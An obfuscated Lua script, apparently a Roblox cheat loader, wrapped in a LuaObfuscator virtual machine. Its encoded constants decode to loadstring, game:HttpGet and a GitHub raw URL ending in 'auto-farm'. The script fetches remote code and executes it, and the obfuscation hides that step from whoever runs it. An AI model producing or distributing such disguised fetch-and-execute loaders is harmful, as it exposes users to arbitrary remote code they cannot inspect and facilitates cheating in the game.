--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (v99==0) then v100=v5(v84,v19);v19=nil;v99=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/((5 -(12 -9))^(v32-(2 -1))))%((1 + 1)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%(932 -(857 + 74))) ;else local v86=2^(v32-(1 -0)) ;return (((v31%(v86 + v86))>=v86) and ((1183 -(32 + 85)) -(68 + 978 + 19))) or ((126 + 442) -(367 + 201)) ;end end local function v21() local v34=957 -(892 + 65) ;local v35;while true do if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -(180 -(67 + 113))) ;v34=1 -0 ;end if (v34==(351 -(87 + 263))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v37 * (628 -372)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 + 0 );v18=v18 + ((1012 -(915 + 82)) -11) ;return (v41 * (16778168 -(802 + (424 -274)))) + (v40 * (176444 -110908)) + (v39 * (464 -208)) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -0)) then if (v47==(0 -0)) then if (v46==(1187 -(1069 + 118))) then return v48 * (0 -(1055 -(87 + 968))) ;else local v101=0 -0 ;while true do if (v101==(0 + 0)) then v47=886 -((1148 -887) + 624) ;v45=0 -0 ;break;end end end elseif (v47==(356 + 1691)) then return ((v46==((0 + 0) -0)) and (v48 * ((1 + 0)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-(3214 -2191) ) * (v45 + (v46/((20 -(10 + 8))^(199 -(332 -185))))) ;end if (v42==(443 -(416 + 26))) then v45=3 -2 ;v46=(v20(v44,1 + 0 ,35 -15 ) * ((440 -((1558 -(447 + 966)) + 293))^(462 -(44 + 386)))) + v43 ;v42=1488 -(998 + 488) ;end if (v42==((2 -1) + 1)) then v47=v20(v44,21,31);v48=((v20(v44,32)==(1 + 0)) and  -(3 -2)) or 1 ;v42=775 -((2018 -(1703 + 114)) + 571) ;end if (v42==(1138 -(116 + 1022))) then v43=v23();v44=v23();v42=4 -3 ;end end end local function v25(v49) local v50=(96 + 605) -((515 -139) + 325) ;local v51;local v52;while true do if (v50==(1 -0)) then v51=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;v50=1 + 1 ;end if (v50==(6 -3)) then return v6(v52);end if (v50==(256 -(163 + 91))) then v52={};for v89=15 -(9 + 5) , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=1 + 2 ;end if (v50==(376 -(85 + 291))) then v51=nil;if  not v49 then v49=v23();if (v49==(1265 -(243 + 1022))) then return "";end end v50=1 -0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 320 -(53 + 267) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0 + 0 ;end)();while true do if (v67~=(1272 -(945 + 326))) then else if (v53~=(984 -(18 + 964))) then else v58[ #"gha"]=(function() return v21();end)();for v102= #":",v23() do local v103=(function() return v21();end)();if (v20(v103, #"}", #"]")~=(0 -0)) then else local v110=(function() return 0;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v110~=(2 -1)) then else v113=(function() return nil;end)();v114=(function() return nil;end)();v110=(function() return 2 + 0 ;end)();end if (v110==(700 -(271 + 429))) then local v142=(function() return 0 + 0 ;end)();local v143=(function() return;end)();while true do if (v142==(1500 -(1408 + 92))) then v143=(function() return 1086 -(461 + 625) ;end)();while true do if (v143~=(1289 -(993 + 295))) then else v110=(function() return 1;end)();break;end if (v143==(0 + 0)) then v111=(function() return 0;end)();v112=(function() return nil;end)();v143=(function() return 1 + 0 ;end)();end end break;end end end if (v110~=2) then else while true do if (v111~= #"!") then else local v167=(function() return 0;end)();local v168=(function() return;end)();while true do if (v167==(0 + 0)) then v168=(function() return 1171 -(418 + 753) ;end)();while true do if (v168==(739 -(542 + 196))) then v111=(function() return 2;end)();break;end if (v168==(0 + 0)) then v114=(function() return {v22(),v22(),nil,nil};end)();if (v112==(0 + 0)) then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185~=0) then else v186=(function() return 0 + 0 ;end)();while true do if (v186==(0 + 0)) then v114[ #"xnx"]=(function() return v22();end)();v114[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v112== #"!") then v114[ #"xnx"]=(function() return v23();end)();elseif (v112==(1 + 1)) then v114[ #"asd"]=(function() return v23() -((531 -(406 + 123))^(41 -25)) ;end)();elseif (v112~= #"19(") then else local v194=(function() return 1769 -(1749 + 20) ;end)();local v195=(function() return;end)();while true do if (v194~=(0 -0)) then else v195=(function() return 1551 -(1126 + 425) ;end)();while true do if (v195==(405 -(118 + 287))) then v114[ #"gha"]=(function() return v23() -((1 + 1)^(62 -46)) ;end)();v114[ #".dev"]=(function() return v22();end)();break;end end break;end end end v168=(function() return 1323 -(1249 + 73) ;end)();end end break;end end end if ((0 + 0)~=v111) then else local v169=(function() return 1121 -(118 + 1003) ;end)();local v170=(function() return;end)();while true do if (v169==(1145 -(466 + 679))) then v170=(function() return 0 -0 ;end)();while true do if (v170==(0 -0)) then v112=(function() return v20(v103,2, #"asd");end)();v113=(function() return v20(v103, #".dev",1906 -(106 + 1794) );end)();v170=(function() return 1;end)();end if (v170~=(1 + 0)) then else v111=(function() return  #"}";end)();break;end end break;end end end if (v111~=(1 + 1)) then else local v171=(function() return 0 -0 ;end)();local v172=(function() return;end)();while true do if (v171==(977 -(553 + 424))) then v172=(function() return 0;end)();while true do if (v172~=1) then else v111=(function() return  #"91(";end)();break;end if (v172==(0 -0)) then if (v20(v113, #"{", #".")~= #"{") then else v114[2]=(function() return v60[v114[2]];end)();end if (v20(v113,3 -1 ,116 -(4 + 110) )== #"[") then v114[ #"nil"]=(function() return v60[v114[ #"asd"]];end)();end v172=(function() return 585 -(57 + 527) ;end)();end end break;end end end if (v111~= #"gha") then else if (v20(v113, #"xnx", #"xnx")~= #"}") then else v114[ #".com"]=(function() return v60[v114[ #"http"]];end)();end v55[v102]=(function() return v114;end)();break;end end break;end end end end for v104= #"<",v23() do v56,v104,v28=(function() return v54(v56,v104,v28);end)();end return v58;end break;end if ((0 + 0)==v67) then if (v53~=(0 + 0)) then else v54=(function() return function(v105,v106,v107) local v108=(function() return 1427 -(41 + 1386) ;end)();local v109=(function() return;end)();while true do if (v108==0) then v109=(function() return 0 + 0 ;end)();while true do if (v109~=(103 -(17 + 86))) then else local v144=(function() return 0 + 0 ;end)();local v145=(function() return;end)();while true do if (v144~=(0 -0)) then else v145=(function() return 0;end)();while true do if ((0 -0)~=v145) then else local v184=(function() return 166 -(122 + 44) ;end)();while true do if (v184~=(0 -0)) then else v105[v106-#"<" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end end break;end end end;end)();v55=(function() return {};end)();v56=(function() return {};end)();v57=(function() return {};end)();v53=(function() return 1 -0 ;end)();end if (v53~=(3 -2)) then else local v98=(function() return 0 + 0 ;end)();while true do if (v98==(1 + 1)) then v53=(function() return 9 -7 ;end)();break;end if (v98~=0) then else v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v98=(function() return 1 -0 ;end)();end if ((66 -(30 + 35))==v98) then v60=(function() return {};end)();for v115= #"}",v59 do local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116==0) then v117=(function() return 1329 -(797 + 532) ;end)();v118=(function() return nil;end)();v116=(function() return 1;end)();end if (v116==(1 + 0)) then v119=(function() return nil;end)();while true do if (v117~=(1 + 0)) then else if (v118== #":") then v119=(function() return v21()~=(1257 -(1043 + 214)) ;end)();elseif (v118==(1 + 1)) then v119=(function() return v24();end)();elseif (v118~= #"xxx") then else v119=(function() return v25();end)();end v60[v115]=(function() return v119;end)();break;end if (v117~=(0 -0)) then else local v181=(function() return 1202 -(373 + 829) ;end)();local v182=(function() return;end)();while true do if ((0 -0)==v181) then v182=(function() return 1212 -(323 + 889) ;end)();while true do if (v182==(1130 -(369 + 761))) then v118=(function() return v21();end)();v119=(function() return nil;end)();v182=(function() return 1 + 0 ;end)();end if (v182~=(1 -0)) then else v117=(function() return 2 -1 ;end)();break;end end break;end end end end break;end end end v98=(function() return 2;end)();end end end v67=(function() return 581 -(361 + 219) ;end)();end end end end local function v29(v61,v62,v63) local v64=v61[1 -0 ];local v65=v61[240 -(64 + 174) ];local v66=v61[1 + 2 ];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1;local v73= -(1 -0);local v74={};local v75={...};local v76=v12("#",...) -(684 -(483 + 200)) ;local v77={};local v78={};for v87=(1679 -(1404 + 59)) -(42 + 174) ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 + 0 ];else v78[v87]=v75[v87 + 1 + 0 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=(0 -0) + 0 ;while true do if ((v88==((2022 -517) -(363 + 1141))) or (1899<917)) then if ((v81<=(1583 -(1183 + 397))) or (4312<=876) or (4619<2882)) then if (v81<=(2 -1)) then if ((v81==(0 + 0)) or (294>=4831)) then do return;end else local v120=(765 -(468 + 297)) + 0 ;local v121;local v122;local v123;local v124;local v125;while true do if ((2232<=2596) and (v120==(1975 -(1913 + 62)))) then v121=nil;v122,v123=nil;v124=nil;v125=nil;v78[v80[2 + 0 ]]=v63[v80[7 -4 ]];v120=1934 -(565 + (1930 -(334 + 228))) ;end if (v120==(7 -5)) then v125=v80[(5609 -3946) -(1477 + 184) ];v124=v78[v80[3 -0 ]];v78[v125 + 1 ]=v124;v78[v125]=v124[v80[4 + 0 ]];v72=v72 + (857 -((1306 -742) + 292)) ;v120=4 -1 ;end if (v120==(8 -5)) then v80=v68[v72];v78[v80[2]]=v80[307 -(244 + 60) ];v72=v72 + (1 -0) + 0 ;v80=v68[v72];v125=v80[478 -(41 + 124 + 311) ];v120=1005 -(938 + 63) ;end if (v120==(5 + 1)) then v78[v80[1127 -((1172 -(141 + 95)) + 189) ]]();v72=v72 + 1 + 0 ;v80=v68[v72];do return;end break;end if (v120==(1614 -(1565 + 48))) then v72=v72 + 1 + 0 ;v80=v68[v72];v78[v80[1140 -(782 + 356) ]]=v63[v80[270 -(176 + 91) ]];v72=v72 + (2 -1) ;v80=v68[v72];v120=2;end if ((2029<=3084) and (2095<3686) and (v120==(5 -1))) then v122,v123=v71(v78[v125](v13(v78,v125 + ((1074 + 19) -(975 + 117)) ,v80[1878 -(157 + 1718) ])));v73=(v123 + v125) -1 ;v121=0;for v174=v125,v73 do v121=v121 + 1 ;v78[v174]=v122[v121];end v72=v72 + 1 + 0 ;v120=17 -12 ;end if (v120==5) then v80=v68[v72];v125=v80[6 -4 ];v78[v125]=v78[v125](v13(v78,v125 + (1019 -(697 + 321)) ,v73));v72=v72 + (2 -(2 -1)) ;v80=v68[v72];v120=6;end end end elseif ((v81==(3 -1)) or (1595>=4474)) then v78[v80[4 -2 ]]();else local v126=v80[1 + 1 ];local v127=v78[v80[(12 -7) -(1 + 1) ]];v78[v126 + (2 -1) ]=v127;v78[v126]=v127[v80[10 -6 ]];end elseif (v81<=(1232 -(227 + 95 + 905))) then if (v81>(615 -(602 + 9))) then v78[v80[2]]=v63[v80[1192 -(449 + 740) ]];else local v133=872 -(826 + 46) ;local v134;local v135;local v136;local v137;while true do if (v133==(948 -(128 + 117 + 702))) then v73=(v136 + v134) -(3 -2) ;v137=0 + 0 ;v133=1900 -(260 + 1638) ;end if ((v133==(0 -0)) or (2037==2420)) then v134=v80[442 -(382 + 58) ];v135,v136=v71(v78[v134](v13(v78,v134 + 1 ,v80[3])));v133=1;end if ((4458>3904) and (v133==(6 -4))) then for v177=v134,v73 do v137=v137 + 1 + 0 + 0 ;v78[v177]=v135[v137];end break;end end end elseif ((436>=123) and (v81>(11 -5))) then local v138=(163 -(92 + 71)) -0 ;local v139;while true do if ((500<1816) and (v138==(1205 -(902 + 303)))) then v139=v80[3 -1 ];v78[v139]=v78[v139](v13(v78,v139 + (2 -1) ,v73));break;end end else v78[v80[1 + 1 ]]=v80[3];end v72=v72 + 1 ;break;end if (v88==(0 + 0)) then v80=v68[v72];v81=v80[1];v88=1691 -(1121 + 569) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034C3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B72616E6F6E652F706C732D646F6E6F2F726566732F68656164732F6D61696E2F6175746F2D6661726D00083Q0012013Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
